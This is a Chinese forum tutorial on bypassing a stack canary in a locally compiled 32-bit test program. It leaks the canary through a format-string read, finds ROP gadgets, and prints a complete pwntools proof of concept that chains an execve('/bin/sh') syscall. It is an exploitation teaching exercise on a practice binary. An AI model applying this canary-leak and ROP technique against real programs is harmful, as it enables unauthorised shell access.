本帖最后由 zhaorong 于 2020-5-27 11:51 编辑
0×01 引言
我们在学ropgadgets与ret2syscall
技术原理时 构造指令流时 是没有加堆栈保护的 比如下面的程序:
文件名:7.c
- #include <stdio.h>
- #include <string.h>
- #include <sys/types.h>
- #include <unistd.h>
- #include <sys/syscall.h>
- void exploit()
- {
- system("/bin/sh");
- }
- void func(){
我们是这样编译的 是没有加堆栈保护的 之后再利用ropgadgets构造指令流 就可以
成功去执行execve(“/bin/sh”,null,null)。
- gcc -no-pie -fno-stack-protector -static -m32 -o 7.exe 7.c
如果加上堆栈保护我们该怎么过呢?像下面这样编译:
- gcc -no-pie -fstack-protector -static -m32 -o 7.exe 7.c
显然我们就不能像原来一样构造指令流了 因为加入了堆栈保护 那我们该怎么办呢?我们可以利用格式化输出
将canary打印出来 然后再进行指令的组装。
0×02 找地址
调试我们的程序 找到canary的地址 地址在:0xffffcfac
继续调试 直到printf 我们看看现在canary据栈顶的位置:0060 除以4等于15 说明传给第一个read
函数的值为%15$08x 就可以将canary打印出来了
重新调试 找到read函数把读进来的数据存放的地址:0xffffcf8c
将%15$08x给read函数 发现可以将canary打印出来
接下来就是利用好第二个read函数来构造rop链了
0×03 构造rop链
linux上系统调用原理:
eax 系统调用号
ebx 第一个参数
ecx 第二个参数
edx 第三个参数
esi 第四个参数
edi 第五个参数
int 0×80
所以eax就存放execve函数的系统调用号11 ebx存放第一个参数/bin/sh ecx存放第二个
参数null 就是0 edx存放第三个参数 也是0
- ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax"
地址用:0x080b8546
- ROPgadget --binary ./7.exe --only "pop|ret" | grep "ebx" | grep "ecx" | grep "edx"
地址为:0x0806f210
- ROPgadget --binary ./7.exe --string "/bin/sh"
地址用:0x080bbd80
- ROPgadget --binary ./7.exe --only "int"|grep "0x80"
地址为:0x0806ce37
0×04 写出poc
- from pwn import *
- context(arch="i386",os="linux")
- p=process('./7.exe')
- p.sendline("%15$08x")
- canary=p.recv()[:8]
- print(canary)
- canary=canary.decode("hex")[::-1]
- coffset=4*8
- roffset=3*4
- add_eax=p32(0x080b8546)
- value_eax=p32(0xb)
- add_edx_ecx_ebx=p32(0x0806f210)
- value_ebx=p32(0x080bbd80)
- value_ecx=p32(0)
- value_edx=p32(0)
- add_int=p32(0x0806ce37)
- payload=coffset*'a'+canary+roffset*'a'+add_eax+value_eax+add_edx_ecx_
- ebx+value_edx+value_ecx+value_ebx+add_int
- p.sendline(payload)
- p.interactive()
从from pwn import *到canary=canary.decode(“hex”)[::-1]都是为了找出canary 因为加了堆栈保护
我们不能直接把数据打入到堆栈中所以要先找出canary,然后构造payload,我们要把canary加进去过
堆栈保护再在后面加上我们的rop链。
执行成功
0×05 总结
开启了堆栈保护 加入了cookie 一旦我们破坏了堆栈 会引起系统保护 出现异常 但是我们还是需要构造我们的指令流
我们可以利用格式化输出,将canary打印出来,接下来我们可以利用读写函数,构造一个指令流,我们先去读看一
下堆栈的canary在哪里,然后我们canary搞出来,把canary再回填进去,进行组装,这样就即可以过堆栈保护
也可以构造我们的指令流了。
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子技术论坛GHOST WIN10X86 快速装机
电脑疯子GHOST WIN10X64 快速装机版201812
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X64 安全增强版20180
电脑疯子技术论坛GHOST WIN10X64 安全增强
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子母盘之:Win7_ultimate_32+64位纯
电脑疯子win7_x64纯净母盘[VIP福利]【旗舰
电脑疯子win7x86纯净母盘[VIP福利]【旗舰版
电脑疯子GHOST XP VIP会员纯净版201901
电脑疯子 GHOST WIN7 X64 快速装机版20201
【全网视频免费看】盒子影视精选+手机影视
电脑疯子母盘之:Windows_10_LTSC_2019【32
电脑疯子 GHOST WINDOWS7 X64 快速装机版20
电脑疯子GHOST WIN10X64 VIP纯净版201901
【2】全网影视VIP视频免费看【投屏观看更爽
电脑疯子母盘之:Windows7_Professional_32
电脑疯子技术论坛GHOST WIN10X64 VIP纯情版
微软常用运行库合集 v2019.07.23(32&64位)
WinRAR 5.71 简体中文零售特别版
